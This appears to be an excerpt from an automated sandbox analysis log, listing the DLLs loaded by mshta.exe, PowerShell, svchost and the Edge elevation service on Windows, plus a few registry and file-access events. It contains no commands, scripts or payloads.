                      Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dbghelp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: edgegdi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: sxs.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dbghelp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: edgegdi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: sxs.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                      Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder	Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
